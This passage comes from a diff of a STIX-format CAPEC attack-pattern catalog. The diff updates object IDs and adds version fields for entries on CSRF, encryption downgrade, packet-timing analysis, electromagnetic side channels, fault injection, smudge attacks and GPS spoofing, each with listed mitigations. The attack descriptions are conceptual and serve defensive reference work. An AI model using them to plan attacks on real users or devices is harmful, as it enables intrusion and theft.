crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply \"riding\" the existing session cookie.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -37340,115 +38002,116 @@ "\n While a user is logged into his bank account, an attacker can send an email with some potentially interesting content and require the user to click on a link in the email.\n The link points to or contains an attacker setup script, probably even within an iFrame, that mimics an actual user form submission to perform a malicious activity, such as transferring funds from the victim's account.\n The attacker can have the script embedded in, or targeted by, the link perform any arbitrary action as the authenticated user. When this script is executed, the targeted application authenticates and accepts the actions based on the victims existing session cookie.See also: Cross-site request forgery (CSRF) vulnerability in util.pl in @Mail WebMail 4.51 allows remote attackers to modify arbitrary settings and perform unauthorized actions as an arbitrary user, as demonstrated using a settings action in the SRC attribute of an IMG element in an HTML e-mail." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--48aae15d-6989-4548-bde1-7a53de36c05b" + "id": "attack-pattern--6ae118bd-2893-4883-aa2c-f1721143de1f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-62-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use cryptographic tokens to associate a request with a specific action. The token can be regenerated at every request so that if a request with an invalid token is encountered, it can be reliably discarded. The token is considered invalid if it arrived with a request other than the action it was supposed to be associated with.", "type": "course-of-action", - "id": "course-of-action--8b683b20-0552-4d3d-802f-d50f25890c25" + "id": "course-of-action--0a3d01e6-7188-42fb-aa3c-b73906334bce" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--9fe7aa33-84df-4fc6-ae3b-c496262998d4", - "source_ref": "course-of-action--8b683b20-0552-4d3d-802f-d50f25890c25", + "id": "relationship--6f07fd19-f35a-46b3-89c8-9213835e51ce", + "source_ref": "course-of-action--0a3d01e6-7188-42fb-aa3c-b73906334bce", "relationship_type": "mitigates", - "target_ref": "attack-pattern--48aae15d-6989-4548-bde1-7a53de36c05b" + "target_ref": "attack-pattern--6ae118bd-2893-4883-aa2c-f1721143de1f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-62-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Although less reliable, the use of the optional HTTP Referrer header can also be used to determine whether an incoming request was actually one that the user is authorized for, in the current context.", "type": "course-of-action", - "id": "course-of-action--d6669fa6-e296-45fc-9f09-876f71fe2ceb" + "id": "course-of-action--9fdce089-87f5-4f2f-b6a2-76e0615286c4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--eb169cdd-bced-4cd2-be85-a8db5d46a3c2", - "source_ref": "course-of-action--d6669fa6-e296-45fc-9f09-876f71fe2ceb", + "id": "relationship--6b7c1535-3adf-434f-b86e-a8a778b3b760", + "source_ref": "course-of-action--9fdce089-87f5-4f2f-b6a2-76e0615286c4", "relationship_type": "mitigates", - "target_ref": "attack-pattern--48aae15d-6989-4548-bde1-7a53de36c05b" + "target_ref": "attack-pattern--6ae118bd-2893-4883-aa2c-f1721143de1f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-62-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Additionally, the user can also be prompted to confirm an action every time an action concerning potentially sensitive data is invoked. This way, even if the attacker manages to get the user to click on a malicious link and request the desired action, the user has a chance to recover by denying confirmation. This solution is also implicitly tied to using a second factor of authentication before performing such actions.", "type": "course-of-action", - "id": "course-of-action--b9a704e2-1e5a-48d6-8cb9-dd3cb00f29e8" + "id": "course-of-action--6f996c4c-d4ef-471a-9766-e81b471238e4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c6fc1066-8958-40c5-b181-8436940cdd8b", - "source_ref": "course-of-action--b9a704e2-1e5a-48d6-8cb9-dd3cb00f29e8", + "id": "relationship--a9ebb372-0dce-4558-9cb8-ea6454d9b79b", + "source_ref": "course-of-action--6f996c4c-d4ef-471a-9766-e81b471238e4", "relationship_type": "mitigates", - "target_ref": "attack-pattern--48aae15d-6989-4548-bde1-7a53de36c05b" + "target_ref": "attack-pattern--6ae118bd-2893-4883-aa2c-f1721143de1f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-62-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "In general, every request must be checked for the appropriate authentication token as well as authorization in the current session context.", "type": "course-of-action", - "id": "course-of-action--c39b8835-64b5-452b-a425-4053594827ba" + "id": "course-of-action--776f161f-fbfa-4de1-9f46-a34bffc47545" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c718093c-778f-4995-a663-cce60f6fa202", - "source_ref": "course-of-action--c39b8835-64b5-452b-a425-4053594827ba", + "id": "relationship--81d26642-80cd-46b4-b990-5e1fcc9ccc5e", + "source_ref": "course-of-action--776f161f-fbfa-4de1-9f46-a34bffc47545", "relationship_type": "mitigates", - "target_ref": "attack-pattern--48aae15d-6989-4548-bde1-7a53de36c05b" + "target_ref": "attack-pattern--6ae118bd-2893-4883-aa2c-f1721143de1f" }, { "name": "Drop Encryption Level", "description": "An attacker forces the encryption level to be lowered, thus enabling a successful attack against the encrypted data.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -37472,15 +38135,16 @@ }, "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--10e6b168-2566-4fe4-b775-1e5e25efc317" + "id": "attack-pattern--aa306f00-7aa1-4eb1-a06b-fee572bc0841" }, { "name": "Analysis of Packet Timing and Sizes", "description": "An attacker may intercept and log encrypted transmissions for the purpose of analyzing metadata such as packet timing and sizes. Although the actual data may be encrypted, this metadata may reveal valuable information to an attacker. Note that this attack is applicable to VOIP data as well as application data, especially for interactive apps that require precise timing and low-latency (e.g. thin-clients).", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -37510,40 +38174,41 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--d82b23d1-ec28-437e-a266-e78958d3b018" + "id": "attack-pattern--465538b7-66d8-47e7-8aa8-e62d380101b1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-621-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Distort packet sizes and timing at VPN layer by adding padding to normalize packet sizes and timing delays to reduce information leakage via timing.", "type": "course-of-action", - "id": "course-of-action--340da3b0-87e4-40a1-9765-8825de883966" + "id": "course-of-action--8fba3d61-e6ad-4c00-8670-50ffb8714714" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a543ea38-edbb-45a6-bf83-bd343f5a5aee", - "source_ref": "course-of-action--340da3b0-87e4-40a1-9765-8825de883966", + "id": "relationship--5f8e2177-5722-41bc-a65c-c3ce8e7ecf10", + "source_ref": "course-of-action--8fba3d61-e6ad-4c00-8670-50ffb8714714", "relationship_type": "mitigates", - "target_ref": "attack-pattern--d82b23d1-ec28-437e-a266-e78958d3b018" + "target_ref": "attack-pattern--465538b7-66d8-47e7-8aa8-e62d380101b1" }, { "name": "Electromagnetic Side-Channel Attack", "description": "In this attack scenario, the attacker passively monitors electromagnetic emanations that are produced by the targeted electronic device as an unintentional side-effect of its processing. From these emanations, the attacker derives information about the data that is being processed (e.g. the attacker can recover cryptographic keys by monitoring emanations associated with cryptographic processing). This style of attack requires proximal access to the device, however attacks have been demonstrated at public conferences that work at distances of up to 10-15 feet. There have not been any significant studies to determine the maximum practical distance for such attacks. Since the attack is passive, it is nearly impossible to detect and the targeted device will continue to operate as normal after a successful attack.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -37573,65 +38238,66 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--a8b756e1-ce13-454e-b624-4a00fa1e66de" + "id": "attack-pattern--23ef3396-6a77-4f83-9d9f-7ed7760f35b1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-622-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Utilize side-channel resistant implementations of all crypto algorithms.", "type": "course-of-action", - "id": "course-of-action--77240b47-452f-425b-8bc3-5222c14d961d" + "id": "course-of-action--a0902427-2b6d-45a5-b6a3-a99eaf8d16c0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c9a8411d-a407-4558-b3c3-e6fe72e8547d", - "source_ref": "course-of-action--77240b47-452f-425b-8bc3-5222c14d961d", + "id": "relationship--bf19970b-a040-4386-9015-519164a84e3e", + "source_ref": "course-of-action--a0902427-2b6d-45a5-b6a3-a99eaf8d16c0", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a8b756e1-ce13-454e-b624-4a00fa1e66de" + "target_ref": "attack-pattern--23ef3396-6a77-4f83-9d9f-7ed7760f35b1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-622-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Strong physical security of all devices that contain secret key information. (even when devices are not in use)", "type": "course-of-action", - "id": "course-of-action--5a5b9194-d49e-4155-a972-821df1597c84" + "id": "course-of-action--c52b6fac-adf1-424a-a09c-e08b395ed0a4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d7a9ed7c-1cf8-4b4d-851c-e73e09c6c6a4", - "source_ref": "course-of-action--5a5b9194-d49e-4155-a972-821df1597c84", + "id": "relationship--f3d0e095-dd5e-4765-ae7e-755163a4687a", + "source_ref": "course-of-action--c52b6fac-adf1-424a-a09c-e08b395ed0a4", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a8b756e1-ce13-454e-b624-4a00fa1e66de" + "target_ref": "attack-pattern--23ef3396-6a77-4f83-9d9f-7ed7760f35b1" }, { "name": "Compromising Emanations Attack", "description": "Compromising Emanations (CE) are defined as unintentional signals which an attacker may intercept and analyze to disclose the information processed by the targeted equipment. Commercial mobile devices and retransmission devices have displays, buttons, microchips, and radios that emit mechanical emissions in the form of sound or vibrations. Capturing these emissions can help an adversary understand what the device is doing.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -37661,40 +38327,41 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--9a147266-a032-4ed6-b137-ce61473d9a6d" + "id": "attack-pattern--10c3386d-d8da-45ea-9963-67befef551d5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-623-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "None are known.", "type": "course-of-action", - "id": "course-of-action--624c18b0-cd40-413b-b5f3-92a38562e92e" + "id": "course-of-action--561921de-6d1a-4bdf-aa42-2fde54309463" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--268d2b38-d476-44bf-8ed2-472f7dfc55cb", - "source_ref": "course-of-action--624c18b0-cd40-413b-b5f3-92a38562e92e", + "id": "relationship--8395c8af-2dba-4608-b79e-25a94a8e8d12", + "source_ref": "course-of-action--561921de-6d1a-4bdf-aa42-2fde54309463", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9a147266-a032-4ed6-b137-ce61473d9a6d" + "target_ref": "attack-pattern--10c3386d-d8da-45ea-9963-67befef551d5" }, { "name": "Fault Injection", "description": "The adversary uses disruptive signals or events (e.g. electromagnetic pulses, laser pulses, clock glitches, etc.) to cause faulty behavior in electronic devices. When performed in a controlled manner on devices performing cryptographic operations, this faulty behavior can be exploited to derive secret key information.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -37732,43 +38399,44 @@ }, "x_capec_abstraction": "Meta", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--8b57176c-2d8a-4c67-94c7-68ad38b8e28d" + "id": "attack-pattern--1eb173db-e5ae-4bf1-b5e4-b4d944ded3db" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-624-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implement robust physical security countermeasures and monitoring.", "type": "course-of-action", - "id": "course-of-action--06118a27-0427-4272-a65f-a4121ed19440" + "id": "course-of-action--766199a6-728f-4772-9a27-191e5f8a072e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--1a7be928-8f0a-4f40-afb4-74c30588549f", - "source_ref": "course-of-action--06118a27-0427-4272-a65f-a4121ed19440", + "id": "relationship--9816bf94-06d8-4eb0-9d7d-6bf0f30107e5", + "source_ref": "course-of-action--766199a6-728f-4772-9a27-191e5f8a072e", "relationship_type": "mitigates", - "target_ref": "attack-pattern--8b57176c-2d8a-4c67-94c7-68ad38b8e28d" + "target_ref": "attack-pattern--1eb173db-e5ae-4bf1-b5e4-b4d944ded3db" }, { "name": "Mobile Device Fault Injection", "description": "Fault injection attacks against mobile devices use disruptive signals or events (e.g. electromagnetic pulses, laser pulses, clock glitches, etc.) to cause faulty behavior. When performed in a controlled manner on devices performing cryptographic operations, this faulty behavior can be exploited to derive secret key information. Although this attack usually requires physical control of the mobile device, it is non-destructive, and the device can be used after the attack without any indication that secret keys were compromised.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -37787,58 +38455,59 @@ "Read Data (Extract long-term secret keys (e.g. keys used for VPN or WiFi authentication and encryption) to enable decryption of intercepted VOIP traffic.)" ] }, - "x_capec_abstraction": "Detailed", + "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--c9be2567-d25d-43af-b4f7-18ca50663ee3" + "id": "attack-pattern--9eb0b1bd-88c1-4fdd-ac6b-126f037807ce" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b29a8993-e4f0-4add-8a2a-707c8b5fd443", - "source_ref": "course-of-action--5a5b9194-d49e-4155-a972-821df1597c84", + "id": "relationship--4dc5a0f9-3494-4485-83a7-e9c8cbb222eb", + "source_ref": "course-of-action--c52b6fac-adf1-424a-a09c-e08b395ed0a4", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c9be2567-d25d-43af-b4f7-18ca50663ee3" + "target_ref": "attack-pattern--9eb0b1bd-88c1-4fdd-ac6b-126f037807ce" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-625-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Frequent changes to secret keys and certificates.", "type": "course-of-action", - "id": "course-of-action--0a4d1643-2995-4cc9-8571-1db941acd9a6" + "id": "course-of-action--6dc1b356-ef19-4ed1-8a64-65470da45dca" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--6e6ba2b5-b818-413b-ae6a-6e16f3d9079d", - "source_ref": "course-of-action--0a4d1643-2995-4cc9-8571-1db941acd9a6", + "id": "relationship--818c7ba6-63c6-459c-9d04-52f2215fcfb6", + "source_ref": "course-of-action--6dc1b356-ef19-4ed1-8a64-65470da45dca", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c9be2567-d25d-43af-b4f7-18ca50663ee3" + "target_ref": "attack-pattern--9eb0b1bd-88c1-4fdd-ac6b-126f037807ce" }, { "name": "Smudge Attack", "description": "Attacks that reveal the password/passcode pattern on a touchscreen device by detecting oil smudges left behind by the user\u2019s fingers.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -37859,40 +38528,41 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--bbb8f249-35d2-4b73-a0c7-1c2096199308" + "id": "attack-pattern--81e9276b-c981-4816-b54c-dc6866cbcd95" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-626-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Strong physical security of the device.", "type": "course-of-action", - "id": "course-of-action--489216c8-6647-44dd-b0e2-d61893fba930" + "id": "course-of-action--4f65d950-6127-48a7-8043-f6fe1f85a9d7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--e0cf9f1c-690d-4042-8f6f-75fde01fbb44", - "source_ref": "course-of-action--489216c8-6647-44dd-b0e2-d61893fba930", + "id": "relationship--61f97eb6-92ac-4930-a8ef-145d7f2aa435", + "source_ref": "course-of-action--4f65d950-6127-48a7-8043-f6fe1f85a9d7", "relationship_type": "mitigates", - "target_ref": "attack-pattern--bbb8f249-35d2-4b73-a0c7-1c2096199308" + "target_ref": "attack-pattern--81e9276b-c981-4816-b54c-dc6866cbcd95" }, { "name": "Counterfeit GPS Signals", "description": "An adversary attempts to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. These spoofed signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -37921,15 +38591,16 @@ }, "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--cd66878f-9b35-4f16-a673-abc73cb2a87a" + "id": "attack-pattern--1807956c-edf7-4fc4-b165-6959f745c791" }, { "name": "Carry-Off GPS Attack", "description": "A common form of a GPS spoofing attack, commonly termed a carry-off attack begins with an adversary broadcasting signals synchronized with the genuine signals observed by the target receiver. The power of the counterfeit signals is then gradually increased and drawn away from the genuine signals. Over time, the adversary can carry the target away from their intended destination and toward a location chosen by the adversary.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -37959,18 +38630,19 @@ "A \"proof-of-concept\" attack was successfully performed in June, 2013, when the luxury yacht \"White Rose\" was misdirected with spoofed GPS signals from Monaco to the island of Rhodes by a group of aerospace engineering students from the Cockrell School of Engineering at the University of Texas in Austin. The students were aboard the yacht, allowing their spoofing equipment to gradually overpower the signal strengths of the actual GPS constellation satellites, altering the course of the 